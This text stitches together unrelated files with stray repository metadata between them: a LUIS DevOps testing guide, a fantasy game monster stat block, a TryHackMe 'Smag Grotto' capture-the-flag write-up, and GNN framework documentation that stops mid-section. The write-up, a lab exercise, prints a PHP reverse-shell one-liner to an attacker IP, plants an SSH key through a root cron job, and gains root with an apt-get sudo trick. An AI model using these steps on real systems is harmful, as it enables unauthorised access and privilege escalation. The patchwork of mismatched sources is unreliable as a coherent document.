#### <a name="designing-batch-tests"></a>Designing batch tests

Batch test sets should contain a large number of test cases, designed to test across all intents and all entities in your LUIS app. See [Batch testing in the LUIS portal](/cognitive-services/luis/luis-concept-batch-test) for information on defining a batch test set.

### <a name="running-tests"></a>Running tests

The LUIS portal offers features that help with interactive testing:

* [Interactive testing](/cognitive-services/luis/luis-concept-test) lets you submit a sample utterance and get a response with the LUIS-recognized intents and entities. You verify the success of the test by visual inspection.
* [Batch testing](/cognitive-services/luis/luis-concept-batch-test) uses a batch test file as input to validate your actively trained version and judge its prediction accuracy. Batch testing helps you view the accuracy of each intent and entity in your active version, displaying the results in a chart.

#### <a name="running-tests-in-an-automated-build-workflow"></a>Running tests in an automated build workflow

The interactive testing features in the LUIS portal are useful, but for DevOps, automated testing performed in a CI/CD workflow has certain requirements:

* Test tools must run in a workflow step on a build server, which means the tools must be able to run on the command line.
* The test tools must be able to execute a group of tests against an endpoint and automatically verify the expected results against the actual results.
* If the tests fail, the test tools must return a status code to halt the workflow and "fail the build".

LUIS offers no command-line tool or high-level API that provides these capabilities. We recommend using the [NLU.DevOps](https://github.com/microsoft/NLU.DevOps) tool to run tests and verify results, both at the command line and during automated testing within a CI/CD workflow.

The testing features available in the LUIS portal don't require a published endpoint and are part of the LUIS authoring capabilities. When you implement testing in an automated build workflow, you must publish the LUIS app version to be tested to an endpoint, so that test tools such as NLU.DevOps can send prediction requests as part of the testing process.

> [!TIP]
> * If you're implementing your own testing solution and writing code to send test utterances to an endpoint, remember that if you use a LUIS authoring key, the allowed transaction rate is limited to 5 TPS. Either throttle the sending rate or use a prediction key instead.
> * When sending test queries to an endpoint, remember to use `log=false` in the query string of your prediction request. This ensures that your test utterances are not logged by LUIS and don't end up in the endpoint utterances review list presented by the LUIS [active learning](/cognitive-services/luis/luis-concept-review-endpoint-utterances) feature, where they could accidentally get added to your app's training utterances.

#### <a name="running-unit-tests-at-the-command-line-and-in-cicd-workflows"></a>Running unit tests at the command line and in CI/CD workflows

You can use the [NLU.DevOps](https://github.com/microsoft/NLU.DevOps) package to run tests at the command line:

* Use the NLU.DevOps [test command](https://github.com/microsoft/NLU.DevOps/blob/master/docs/Test.md) to submit the tests from a test file to an endpoint and capture the actual prediction results in a file.
* Use the NLU.DevOps [compare command](https://github.com/microsoft/NLU.DevOps/blob/master/docs/Analyze.md) to compare the actual results with the expected results defined in the input test file. The `compare` command generates NUnit test output, and when used in [unit test mode](https://github.com/microsoft/NLU.DevOps/blob/master/docs/Analyze.md#unit-test-mode) via the `--unit-test` flag, it asserts that all tests pass.
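Putting the two commands together, a unit-test step in a CI workflow might look like the following sketch. The long option names (`--service`, `--utterances`, `--output`, `--expected`, `--actual`) reflect the NLU.DevOps documentation as best understood here and should be verified against it; the file names are placeholders:

```bash
# Send the test utterances to the published LUIS endpoint and capture
# the actual prediction results (tests.json / results.json are placeholders).
dotnet nlu test --service luis --utterances tests.json --output results.json

# Compare actual results against the expected results; --unit-test makes
# the command assert that every test passes, failing the build otherwise.
dotnet nlu compare --expected tests.json --actual results.json --unit-test
```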
### <a name="running-batch-tests-at-the-command-line-and-in-cicd-workflows"></a>Running batch tests at the command line and in CI/CD workflows

You can also use the NLU.DevOps package to run batch tests at the command line.

* Use the NLU.DevOps [test command](https://github.com/microsoft/NLU.DevOps/blob/master/docs/Test.md) to submit the tests from a test file to an endpoint and capture the actual prediction results in a file, the same as with unit testing.
* Use the NLU.DevOps [compare command](https://github.com/microsoft/NLU.DevOps/blob/master/docs/Analyze.md) in [performance test mode](https://github.com/microsoft/NLU.DevOps/blob/master/docs/Analyze.md#performance-test-mode) to measure the performance of your app. You can also compare the performance of your app against a baseline performance benchmark, for example, the results of the latest commit to main or the current release. In performance test mode, the `compare` command generates NUnit test output and [batch test results](/cognitive-services/luis/luis-glossary#batch-test) in JSON format.

## <a name="luis-non-deterministic-training-and-the-effect-on-testing"></a>LUIS non-deterministic training and the effect on testing

When LUIS trains a model, such as an intent, it needs both positive data - the labeled training utterances that you've supplied to train the app for the model - and negative data - data that is not a valid example of the use of that model. During training, LUIS builds the negative data for one model from all the positive data you've supplied for the other models, but in some cases this can lead to a data imbalance. To avoid this imbalance, LUIS samples a subset of the negative data in a non-deterministic fashion, optimizing for a better-balanced training set, improved model performance, and faster training time.

The result of this non-deterministic training is that you may get a [slightly different prediction response between different training sessions](/cognitive-services/luis/luis-concept-prediction-score), usually for intents and/or entities where the [prediction score](/cognitive-services/luis/luis-concept-prediction-score) is not high.

If you want to disable non-deterministic training for the LUIS app versions that you build for testing purposes, use the [Version settings API](https://dev.cognitive.azure.cn/docs/services/5890b47c39e2bb17b84a55ff/operations/versions-update-application-version-settings) with the `UseAllTrainingData` setting set to `true`.

## <a name="next-steps"></a>Next steps

* Learn how to [implement CI/CD workflows](luis-concept-devops-automation.md)
* Learn how to [implement DevOps for LUIS with GitHub](luis-how-to-devops-with-github.md)
44.880282
349
0.776244
yue_Hant
0.860153
53a3aa58120b2c229efd5f02faf55cde0e5bd56c
3,017
md
Markdown
_creatures/ink-devil.md
5ecompendium/bestiary2
cca658a7536f9e5afd795731bb70f96da700e76a
[ "MIT" ]
4
2019-09-16T12:25:41.000Z
2022-03-03T10:43:10.000Z
_creatures/ink-devil.md
5ecompendium/bestiary2
cca658a7536f9e5afd795731bb70f96da700e76a
[ "MIT" ]
null
null
null
_creatures/ink-devil.md
5ecompendium/bestiary2
cca658a7536f9e5afd795731bb70f96da700e76a
[ "MIT" ]
5
2019-08-21T18:50:47.000Z
2021-04-27T19:52:29.000Z
--- layout: creature name: "Ink Devil" tags: [small, fiend, cr2, tome-of-beasts] cha: 18 (+4) wis: 8 (-1) int: 20 (+5) con: 12 (+1) dex: 18 (+4) str: 12 (+1) size: Small fiend alignment: lawful evil challenge: "2 (450 XP)" languages: "Celestial, Common, Draconic, Infernal; telepathy (120 ft.)" skills: "Arcana +9, Deception +8, History +9, Stealth +8" senses: "darkvision 120 ft., passive Perception 9" saving_throws: "Dex +6" damage_immunities: "fire, poison" damage_resistances: "cold; bludgeoning, piercing, and slashing from nonmagical weapons that aren't silvered" condition_immunities: "poisoned" speed: "30 ft." hit_points: "54 (12d6 + 12)" armor_class: "14" --- ***Devil's Sight.*** Magical darkness doesn't impede the devil's darkvision. ***Magic Resistance.*** The devil has advantage on saving throws against spells and other magical effects. ***Innate Spellcasting.*** The ink devil's spellcasting ability is Charisma (spell save DC 14). The ink devil can cast the following spells, requiring no material components: * At will: <i>detect magic, illusory script, invisibility, teleportation </i>(self plus 50 lb of objects only) * 1/day each: <i>glyph of warding, planar ally </i>(1d4 + 1 lemures 40 percent, or 1 ink devil 25 percent) ### Actions ***Bite.*** Melee Weapon Attack: +6 to hit, reach 5 ft., single target. Hit: 11 (2d6 + 4) piercing damage. ***Claw.*** Melee Weapon Attack: +6 to hit, reach 5 ft., single target. Hit: 14 (3d6 + 4) slashing damage. ***Corrupt Scroll.*** An ink devil can corrupt the magic within any scroll by touch. Any such corrupted scroll requires a DC 13 Intelligence saving throw to use successfully. If the check fails, the scroll's spell affects the caster if it is an offensive spell, or it affects the nearest devil if it is a beneficial spell. ***Devil's Mark.*** Ink devils can flick ink from their fingertips at a single target within 15 feet of the devil. The target must succeed on a Dexterity saving throw (DC 13), or the affected creature gains a devil's mark: a black, red, or purple tattoo in the shape of an archduke's personal seal (most often Mammon or Totivillus but sometimes Arbeyach, Asmodeus, Beelzebub, Dispater, or others). All devils have advantage on spell attacks made against the devil-marked creature, and the creature has disadvantage on saving throws made against spells and abilities used by devils. The mark can be removed only by a remove curse spell or comparable magic. In addition, the mark detects as faintly evil and often shifts its position on the body. Paladins, witchfinders, and some clerics may consider such a mark proof that a creature has made a pact with a devil. ### Bonus Actions ***Disrupt Concentration.*** Their sharp, shrill tongues and sharper claws make ink devils more distracting than their own combat prowess might indicate. An ink devil can force a single foe within 30 feet of the ink devil to make a DC 13 Wisdom saving throw or lose concentration until the beginning of the target's next turn.
61.571429
862
0.751077
eng_Latn
0.994964
53a4ea5f987d47c8af971334ec2fd6621143909f
3,897
md
Markdown
hacking/_posts/2020-07-31-smag.md
0xordinaryday/blog
8b7bc6c3ad43f6631daa5337b2f2e4f6e3656ac4
[ "MIT" ]
null
null
null
hacking/_posts/2020-07-31-smag.md
0xordinaryday/blog
8b7bc6c3ad43f6631daa5337b2f2e4f6e3656ac4
[ "MIT" ]
3
2021-05-20T19:06:26.000Z
2021-09-12T09:55:32.000Z
hacking/_posts/2020-07-31-smag.md
0xordinaryday/blog
8b7bc6c3ad43f6631daa5337b2f2e4f6e3656ac4
[ "MIT" ]
null
null
null
---
layout: post
title: "THM - Smag Grotto"
date: 2020-07-31 18:00:00 +1000
category: hacking
---
## Introduction
*Do you remember how to analyse packets?*

This is an easy-rated box. Let's begin.

## Ports
nmap says we've got 22 (SSH) and 80 (HTTP) only.

## Webserver
There's not much on the home page of the website, so we'll run a quick gobuster:

`` root@kali:/opt/tryhackme/smag# gobuster dir -u http://10.10.184.160 -w /usr/share/dirb/wordlists/common.txt ``

This turns up one interesting directory: mail. Checking that, we get a message about a packet capture along with a download link. It says you have to download it with wget, although I'm sure that's not actually necessary. Let's do it anyway:

{% highlight shell %}
root@kali:/opt/tryhackme/smag# wget http://10.10.184.160/aW1wb3J0YW50/dHJhY2Uy.pcap
--2020-07-31 03:52:52--  http://10.10.184.160/aW1wb3J0YW50/dHJhY2Uy.pcap
Connecting to 10.10.184.160:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1209 (1.2K) [application/vnd.tcpdump.pcap]
Saving to: ‘dHJhY2Uy.pcap’

dHJhY2Uy.pcap                 100%[====================================================================>]   1.18K  --.-KB/s    in 0s

2020-07-31 03:52:53 (29.8 MB/s) - ‘dHJhY2Uy.pcap’ saved [1209/1209]
{% endhighlight %}

## PCAP
We can open the packet capture in Wireshark and it's very straightforward: we find a POST request with some important details, namely a new subdomain: http://development.smag.thm/login.php and some credentials: **helpdesk:REDACTED**

We add development.smag.thm to our /etc/hosts and continue.

## Admin.php
Once we go to development.smag.thm/login.php and authenticate, we get a page that says 'enter a command'. Any number of commands can be tried, but none of them appear to do anything... until you start a listener and try a reverse shell:

`` php -r '$sock=fsockopen("10.9.10.123",1234);exec("/bin/sh -i <&3 >&3 2>&3");' ``

Thanks, [pentestmonkey](pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet).

## On the box
As usual I run linpeas; this time we find a cron job:

`` root /bin/cat /opt/.backups/jake_id_rsa.pub.backup > /home/jake/.ssh/authorized_keys ``

So the job is copying jake's public key to the authorized keys file. Good to know.

## SSH-keygen
Let's generate a new SSH key with ssh-keygen:

{% highlight shell %}
root@kali:/opt/tryhackme/smag# ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): ./id_rsa
{% endhighlight %}

Once that's done (with a passphrase of 'yolo'), we can get it onto the box, append it to the jake_id_rsa.pub.backup file, and wait for the cron job to run.

{% highlight shell %}
wget http://10.9.10.123:8000/id_rsa.pub
--2020-07-31 04:17:32--  http://10.9.10.123:8000/id_rsa.pub
Connecting to 10.9.10.123:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 563 [application/octet-stream]
Saving to: 'id_rsa.pub'

id_rsa.pub          100%[===================>]     563  --.-KB/s    in 0s

2020-07-31 04:17:33 (106 MB/s) - 'id_rsa.pub' saved [563/563]

www-data@smag:/dev/shm$ /bin/cat id_rsa.pub >> /opt/.backups/jake_id_rsa.pub.backup
{% endhighlight %}

## Jake
Now we can log in as jake with our passphrase:

`` root@kali:/opt/tryhackme/smag# ssh -i id_rsa [email protected] ``

Running **sudo -l** gives us this:

{% highlight shell %}
jake@smag:~$ sudo -l
Matching Defaults entries for jake on smag:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User jake may run the following commands on smag:
    (ALL : ALL) NOPASSWD: /usr/bin/apt-get
{% endhighlight %}

And [GTFOBins](https://gtfobins.github.io/gtfobins/apt-get/) does the rest:

{% highlight shell %}
jake@smag:~$ sudo apt-get update -o APT::Update::Pre-Invoke::=/bin/sh
# whoami
root
{% endhighlight %}
33.886957
241
0.691301
eng_Latn
0.844307
53a53cf5e18f321cb6a05543d4edd969a2cb2c68
2,709
md
Markdown
docs/framework/unmanaged-api/debugging/icordebugappdomain3-getcachedwinrttypesforiids-method.md
rscprof/docs.ru-ru
9c2a47b4b444efb88ed2c2d943b09721415d5ed0
[ "CC-BY-4.0", "MIT" ]
null
null
null
docs/framework/unmanaged-api/debugging/icordebugappdomain3-getcachedwinrttypesforiids-method.md
rscprof/docs.ru-ru
9c2a47b4b444efb88ed2c2d943b09721415d5ed0
[ "CC-BY-4.0", "MIT" ]
null
null
null
docs/framework/unmanaged-api/debugging/icordebugappdomain3-getcachedwinrttypesforiids-method.md
rscprof/docs.ru-ru
9c2a47b4b444efb88ed2c2d943b09721415d5ed0
[ "CC-BY-4.0", "MIT" ]
null
null
null
---
title: ICorDebugAppDomain3::GetCachedWinRTTypesForIIDs Method
ms.date: 03/30/2017
api_name:
- ICorDebugAppDomain3.GetCachedWinRTTypesForIIDs
api_location:
- mscordbi.dll
api_type:
- COM
f1_keywords:
- ICorDebugAppDomain3::GetCachedWinRTTypesForIIDs
helpviewer_keywords:
- ICorDebugAppDomain3::GetCachedWinRTTypesForIIDs method, [.NET Framework debugging]
- GetCachedWinRTTypesForIIDs method, ICorDebugAppDomain3 interface [.NET Framework debugging]
ms.assetid: 23682ca0-1bcf-48e6-996e-69f7ba337682
topic_type:
- apiref
author: rpetrusha
ms.author: ronpet
ms.openlocfilehash: 7c8c82b3ace19d4b1d79fbfd296ce239e6da99ef
ms.sourcegitcommit: 3d5d33f384eeba41b2dff79d096f47ccc8d8f03d
ms.translationtype: MT
ms.contentlocale: ru-RU
ms.lasthandoff: 05/04/2018
ms.locfileid: "33409561"
---
# <a name="icordebugappdomain3getcachedwinrttypesforiids-method"></a>ICorDebugAppDomain3::GetCachedWinRTTypesForIIDs Method

Gets an enumerator for the cached [!INCLUDE[wrt](../../../../includes/wrt-md.md)] types in an application domain based on their interface IDs.

## <a name="syntax"></a>Syntax

```
HRESULT GetCachedWinRTTypesForIIDs (
   [in] ULONG32 cReqTypes,
   [in] GUID *iidsToResolve,
   [out] ICorDebugTypeEnum **ppTypesEnum
);
```

#### <a name="parameters"></a>Parameters

`cReqTypes`

[in] The number of required types.

`iidsToResolve`

[in] A pointer to an array that contains the interface IDs corresponding to the managed representations of the [!INCLUDE[wrt](../../../../includes/wrt-md.md)] types to be retrieved.

`ppTypesEnum`

[out] A pointer to the address of an "ICorDebugTypeEnum" interface object that allows enumeration of the cached managed representations of the [!INCLUDE[wrt](../../../../includes/wrt-md.md)] types retrieved, based on the interface IDs in `iidsToResolve`.

## <a name="remarks"></a>Remarks

If the method fails to retrieve information for a specific interface ID, the corresponding entry in the "ICorDebugTypeEnum" collection will have a type of `ELEMENT_TYPE_END` for errors caused by data retrieval problems, or `ELEMENT_TYPE_VOID` for unknown interface IDs.

## <a name="requirements"></a>Requirements

**Platforms:** [!INCLUDE[wrt](../../../../includes/wrt-md.md)]

**Header:** CorDebug.idl, CorDebug.h

**Library:** CorGuids.lib

**.NET Framework versions:** [!INCLUDE[net_current_v45plus](../../../../includes/net-current-v45plus-md.md)]

## <a name="see-also"></a>See also

[ICorDebugAppDomain3 Interface](../../../../docs/framework/unmanaged-api/debugging/icordebugappdomain3-interface.md)
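As a usage illustration, the following C++ sketch is not part of the original reference page; it assumes you already hold a valid `ICorDebugAppDomain3` pointer obtained from the debugging API, and the contents of the IID array are placeholders:

```cpp
#include <cordebug.h>

HRESULT EnumerateCachedWinRTTypes(ICorDebugAppDomain3 *pAppDomain3)
{
    // Placeholder IIDs of the Windows Runtime interfaces to resolve.
    GUID iidsToResolve[2] = { /* fill in real interface IDs here */ };
    ICorDebugTypeEnum *pTypeEnum = nullptr;

    HRESULT hr = pAppDomain3->GetCachedWinRTTypesForIIDs(
        2,              // cReqTypes: number of requested types
        iidsToResolve,  // interface IDs to resolve
        &pTypeEnum);    // receives the enumerator

    if (SUCCEEDED(hr) && pTypeEnum != nullptr)
    {
        ICorDebugType *pType = nullptr;
        ULONG fetched = 0;
        // Entries may come back as ELEMENT_TYPE_END or ELEMENT_TYPE_VOID
        // when a given IID could not be resolved (see the Remarks above).
        while (pTypeEnum->Next(1, &pType, &fetched) == S_OK && fetched == 1)
        {
            // ... inspect pType here ...
            pType->Release();
        }
        pTypeEnum->Release();
    }
    return hr;
}
```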
42.328125
281
0.74234
yue_Hant
0.148076
53a55397aa2e88b6a2045f1be59c152c9fa66cf0
1,216
md
Markdown
packages/cli/README.md
morphatic/gridsome
12c486545170feb4096ffd88600e618873884a9a
[ "MIT" ]
3
2021-04-30T23:37:53.000Z
2021-12-07T21:43:04.000Z
packages/cli/README.md
morphatic/gridsome
12c486545170feb4096ffd88600e618873884a9a
[ "MIT" ]
74
2019-07-20T01:37:16.000Z
2021-08-03T20:27:32.000Z
packages/cli/README.md
morphatic/gridsome
12c486545170feb4096ffd88600e618873884a9a
[ "MIT" ]
2
2020-07-15T14:02:07.000Z
2020-07-15T14:03:36.000Z
# @gridsome/cli > A command line tool for creating new Gridsome projects. ## Installation Install globally with `npm install --global @gridsome/cli` or `yarn global add @gridsome/cli` ## Creating new projects Run `gridsome create {name} {starter}` to create a new Gridsome project. - **name** - directory name to create the project in - **starter** - optional starter kit name | Official starter kits | | | --------------------- | --------------------------------------- | | Default | `gridsome create my-website` | | WordPress | `gridsome create my-blog wordpress` | ## Start local development Run `gridsome develop` inside the project directory to start a local development server. The server will start at `http://localhost:8080/` with hot-reloading etc. ## Explore GraphQL schema and data Run `gridsome explore` to start [GraphQL Playground](https://github.com/prisma/graphql-playground) and explore your schema or data. Open your browser and go to `http://localhost:8080/___explore` to start exploring. ## Build for production Run `gridsome build` to generate a static site inside a `dist` directory in your project.
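## Putting it together

Putting the commands above into one session, a typical first run might look like this (`my-website` is just an example name):

```sh
# install the CLI globally
npm install --global @gridsome/cli

# scaffold a project and start the dev server at http://localhost:8080/
gridsome create my-website
cd my-website
gridsome develop

# generate the static site into ./dist when you are ready to publish
gridsome build
```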
34.742857
98
0.660362
eng_Latn
0.971215
53a5a67de3c77aa66c7d2a5b601f4f9c3f5fd238
48,569
md
Markdown
docs/model_description.md
BNN-UPC/ignnition
905e4aa756ad6dd92d620f5f8b37d8190bb5273a
[ "BSD-3-Clause" ]
18
2021-06-09T15:52:55.000Z
2022-03-28T05:54:14.000Z
docs/model_description.md
BNN-UPC/ignnition
905e4aa756ad6dd92d620f5f8b37d8190bb5273a
[ "BSD-3-Clause" ]
11
2021-06-03T07:55:04.000Z
2022-03-11T16:54:15.000Z
docs/model_description.md
knowledgedefinednetworking/ignnition
905e4aa756ad6dd92d620f5f8b37d8190bb5273a
[ "BSD-3-Clause" ]
12
2020-07-07T16:45:09.000Z
2021-04-05T15:55:30.000Z
# Model Description

## Multi-stage Message Passing

In order to efficiently define *GNN* models, we propose a novel high-level abstraction called the *Multi-Stage Message Passing graph* (hereafter *MSMP* graph). This abstraction mainly addresses the principles of simplicity and versatility. As such, it abstracts users from all the mathematical formulation behind *GNNs* and the programming obstacles imposed by traditional Deep Learning languages. Additionally, this abstraction also addresses the principle of reliability by providing a full picture of the message passing within *GNNs*, clearly identifying the different message-passing phases and the relationships between the entities involved.

The *MSMP* graph abstraction provides an interface with a flexible modular design, providing support for any variant of state-of-the-art *GNN* architectures as well as custom combinations of individual components present in existing *GNNs* (e.g., messages, aggregations, updates, loss, normalization functions). In the networking field, *GNN* models are usually non-standard. They often need to be highly customized in order to adapt to complex network scenarios, usually addressing challenging modeling or optimization problems. Thus, proposed solutions typically require tailor-made *GNN* architectures that include different element types in graphs (e.g., forwarding devices, links) and message-passing schemes divided into multiple sequentially arranged phases.

In this context, and in line with the focus of *IGNNITION* on network applications, one main novelty of the proposed *MSMP* graph abstraction is that it provides support for defining message passings divided into multiple stages and including different types of elements (also called *entities*). To the best of our knowledge, this makes it possible to implement all the existing GNN architectures applied to networking to date.

![General MSMP definition](Images/general_msmp.png)

In particular, with the *MSMP* graph abstraction, a *GNN* design can be intuitively defined by a set of graph entities and how they relate to each other in a sequential order, which eventually describes a message-passing iteration of the *GNN*. The figure above illustrates an example of a *GNN* with three different entity types (*e1*, *e2* and *e3*). In this MSMP graph, we can observe two differentiated stages in the message passing. In the first stage, entities of type *e1* and *e2* send their hidden states to their neighbors of type *e3* according to the connections of the input graph. Then, in the second stage, *e3* entities send their states to the linked entities of type *e1* and *e2*. This process is then repeated for a number of iterations *T* to make the states converge to some fixed values.

Thus, *IGNNITION* supports any *GNN* that can be represented as an *MSMP* graph. This broadly includes the main state-of-the-art *GNN* architectures and all their variants, such as *Graph Attention Networks*, *Graph Convolutional Networks*, *Gated Neural Networks*, *Graph LSTM*, *Typed Graph Networks*, *Hypergraph Neural Networks*, and many others.

In order to further illustrate this abstraction, we shall focus on *RouteNet*, which is a representative *GNN* model applied to networking. *RouteNet* was proposed as a solution to efficiently model performance in networks.
To do this, in the original paper the authors formulate a complex mathematical model with a hypergraph that includes two types of entities: *(i)* the links of the input topology, and *(ii)* the end-to-end paths formed by the routing configuration. However, with *MSMP* graphs, *RouteNet* can be easily defined by a two-stage message-passing scheme including the two entities involved and how they exchange their states (as shown in the figure below).

![RouteNet MSMP definition](Images/msmp_routenet.png)

In particular, in this *GNN* each *link* first shares its state with all its related paths (i.e., the *paths* that traverse the link). Afterward, each path sends its state to its related *links* (i.e., the *links* that form the *path*). Note that in this two-stage message passing, the input graph of the *GNN* does not have a direct mapping to the network topology itself; instead, graph nodes are the different entities included in the MSMP graph (i.e., links and paths), and edges are the relationships between these elements. Thus, messages are not necessarily sent physically over the network. They are just logical objects that represent the exchange of hidden states between links and paths.

In the end, this abstraction enables a simple interface for users, who can easily define their own *GNN* models adapted to specific problems, just by defining the entities involved and their relationships. Lastly, *IGNNITION* produces an efficient implementation of the designed *GNN* in *TensorFlow*.

## Generate your GNN

In order to define the architecture of the GNN we aim to create, the user is asked to define a model_description.yml file. This file will contain several sections that define different aspects of our GNN. More specifically, the sections we must fill in are:<br>
1. [Entity definition](#step-1-entity-definition)<br>
2. [Message passing definition](#step-2-message-passing-definition)<br>
3. [Readout definition](#step-3-readout-definition)<br>
4. [Internal Neural Network definition](#step-4-internal-neural-networks-definition)

Let us now go into a little more detail on each of these sections.

### Step 1: Entity definition

When designing a GNN, we might find situations in which not all the nodes in the graph behave as or represent the same object. Hence, we might need to consider different behaviours depending on the type of node in question. For this, we shall refer to an entity as a type of node in the graph.

![MSMP definition](Images/entities.png)

From this example, we can observe that two entities must be created. Consequently, our model_description file must include a definition for each of them. Let us briefly describe how this can be done.

```yaml
- entity: entity1
  state_dimension: 32
  initial_state:
    - type: build_state
      input: [feature1, feature2]

- entity: entity2
  state_dimension: 32
  initial_state:
    - type: build_state
      input: [feature3]
```

In the code above, we can see that we simply have to create a list of two entities (this will depend on the problem). Then, for each of the entities, we first indicate its name, which we will use throughout the rest of the definition of the GNN to refer to this type of node. Additionally, we provide the dimension of the states that each of these nodes will have. Finally, we must indicate how the initial state is computed. For this definition, we must provide a list of "operations" which incrementally define the resulting initial state.
For simplicity, in this example we simply define an initial state with *feature1* and *feature2*, and the rest of the dimensions will be padded with 0s. Note that we do the same with *entity2*.

### Step 2: Message passing definition

At this point, we must define the core part of the GNN algorithm, which is the neural message-passing phase. In this phase, we define how the different nodes in the graph exchange messages with each other, in order to produce node embeddings that properly consider the structural information of the graph. For this, let us define some terminology that will help us to easily describe potentially very complex GNNs.

#### What is a single message-passing?

The message-passing phase is the process of nodes from the graph sending messages to other nodes of the graph. Note, however, from the previous sections that in a complex setting we might have numerous different types of nodes in the graph which we want to consider independently. Hence, we must further generalize the idea of message-passing to make the appropriate considerations.

In this context, we shall refer to a single message-passing as the process of the nodes of the source entity types *(a, b, ..., k)* sending messages to a destination entity *dest_entity*. In the simplest scenario, we might want to define a single message-passing as the process of nodes of type *a* sending messages to the nodes of type *b*. In other scenarios, however, entities *a* and *b* might be simultaneously sending messages to another entity's nodes *c*.

#### How to define a single message-passing?

At this point, in order to illustrate this idea, let us suppose we are considering a single message-passing in which nodes from entities *a* and *b* simultaneously send messages to the corresponding nodes of entity *c*. For this, we must define the following functions:

##### Message function

A message function is defined for each of the source entities to the given destination entity. The message function defines how the source nodes will form the message that they will send to their corresponding destination nodes. Below we provide a visualization of this process through an arbitrary graph of 3 different nodes.

![MSMP definition](Images/message.png)

##### Aggregation function

Once we have defined the message function for each of the source entities (in this case, for the source entity *a* and for the entity *b* respectively), we need to define the aggregation function. The aggregation function defines how each of the destination nodes will take all the messages received from both entity *a* and *b*, and produce one single input. For this, *IGNNITION*, as seen before, allows a pipeline of operations which incrementally allows users to define potentially very complex strategies for this aggregation function. Below we show an illustration of this process; for simplicity, with an aggregation function consisting of a single operation which sums all the messages into a single final input.

![MSMP definition](Images/aggregation.png)

##### Update function

Finally, we reach the point in which each of the destination nodes has produced an aggregated input of all the messages received. It just remains to create the corresponding update function of the destination entity that describes how it will use this information to update its current hidden state. Following the same schema used before, the illustration below exemplifies this process graphically.
![MSMP definition](Images/update.png)

#### Using stages to define chronological orderings

So far, we have talked about how we can create a single message-passing. One must note, however, that a complex GNN may contain many of these single message-passings. For this, we need to be able to properly order them chronologically. In order to simplify this ordering, we create what we call a *stage*. A stage symbolizes a given time-step of the algorithm. Then, to create our GNN, we can create several *stages*, and we can then assign single message-passings to a given stage.

To illustrate this, let us suppose we have created three single message-passings from the entities we have in the graph. Then, for instance, we might want to perform the first two single message-passings simultaneously and, once they are done, execute the third one. This can be done by creating two different stages. We then assign the first two single message-passings to the first stage (first time-step) and the third single message-passing to the second stage (second time-step).

![stages definition](Images/general_description_stages.png)

#### Defining the message-passing phase

First of all, we must define the number of iterations (num_iterations). This indicates the number of times that all the given stages will perform all their single message-passings. Afterwards, we can proceed to define a list of *stages*. For the sake of simplicity, let us only define one; to define more, we just need to include more elements in the list of *stages*.

To define a *stage*, the user must define all the *stage_message_passings*, these being all the *single message-passings* that must be executed during this time step (all of them simultaneously). Note that for each of them we define the three functions mentioned before (message function, aggregation function and update function). Visit [keywords](../model_description/#keyword-definition) to get more information about the exact keywords that you can use in these sections.

```yaml
message_passing:
    num_iterations: 8
    stages:
        stage_message_passings:
            destination_entity: c
            source_entities:
                - name: a
                  message:
                    type: direct_assignment
                - name: b
                  message:
                    type: direct_assignment
            aggregation:
                - type: sum
            update:
                type: recurrent_neural_network
                nn_name: recurrent1
```

### Step 3: Readout definition

Once we have defined the message passing, it remains to define the readout. The readout function is the one in charge of taking some/all of the final states computed during the message passing, and using them appropriately to predict the final label. For this, again, we allow full flexibility for this definition in the form of a pipeline of operations (as seen before). For the sake of simplicity, let's suppose we aim to make a prediction over a global property of the graph. For this, we want to sum together all the final states of the nodes of type *a*, and then pass this to a neural network that computes the *output_label*. In this case, we would need to define two operations: one that sums all the states together, and another one that passes this output to the neural network. Below we show how this would be done.

```yaml
readout:
- type: pooling
  type_pooling: sum
  input: [a]
  output_name: pooled_a
- type: feed_forward
  input: [pooled_a]
  nn_name: readout_model
  output_label: my_label
```

As you can see, we make use of the field *output_name* to define a name for the output of the first operation, which we can then use as input for the second operation.
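To illustrate this chaining a little further, here is a sketch of a readout that pools two entity types separately and feeds both results to the readout network. It only recombines operations already introduced above; the entity names *a* and *b* and the label name are placeholders:

```yaml
readout:
- type: pooling
  type_pooling: sum
  input: [a]
  output_name: pooled_a
- type: pooling
  type_pooling: sum
  input: [b]
  output_name: pooled_b
- type: feed_forward
  input: [pooled_a, pooled_b]
  nn_name: readout_model
  output_label: my_label
```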
### Step 4: Internal neural networks definition

Finally, it only remains to define the neural networks. Notice that in all the previous sections we have not explicitly defined the actual architecture of the neural networks, but rather only referenced them by name. In this section, we must indicate the actual architecture of each of them. For instance, we show below how to create the *readout_model* neural network that we referenced in the readout. For this, we must define each of its layers.

```yaml
neural_networks:
- nn_name: readout_model
  nn_architecture:
  - type_layer: Dense
    units: 256
    activation: sigmoid
  - type_layer: Dropout
    rate: 0.5
  - type_layer: Dense
    units: 1
```

In this example, we are linking the name *readout_model* to a neural network with three layers of type Dense, Dropout and another Dense. This definition is done through a list of layers (which can be arbitrarily long). An important consideration is that *IGNNITION* allows the use of all the layer types presented in the [Keras library](https://www.tensorflow.org/api_docs/python/tf/keras/layers). Moreover, each of these layers can have numerous parameters that tune its properties. For this, again, we support all the parameters accepted by Keras for each layer respectively. This is done by simply adding them to the properties of each layer (e.g., the activation function in the first Dense layer). If a parameter is not defined (in case this is stated to be an optional parameter in the Keras documentation), then *IGNNITION* will use the default parameter used by Keras.

### Putting it into practice

So far, this section has covered in a very general way how to define a *GNN*. To really get your hands on this topic, we recommend checking our [quick tutorial](quick_tutorial.md), where we put all these concepts into practice to solve the specific problem of finding the *shortest path* in a graph.

## Keyword definition

In this section we will focus in more depth on the keywords available to design each of the sections that define the GNN, and how to use them. More specifically, we will cover the keywords for each of the following sections.

- [Step 1: Entity definition](#step-1-entity-definition)<br>
- [Step 2: Message-passing phase](#step-2-message-passing-phase)<br>
- [Step 3: Readout](#step-3-readout)<br>
- [Step 4: Internal Neural Network definition](#step-4-internal-neural-networks)

### Step 1: Entity definition

In order to create the entities, we must define a list "entities". For this, we must define an object "Entity". We shall now describe the different keywords that the user must / can define to model the new entity, these being:<br>

- [Parameter: name](#parameter-name)<br>
- [Parameter: state_dim](#parameter-state_dim)<br>
- [Parameter: initial_state](#parameter-initial_state)

---

#### Parameter: name

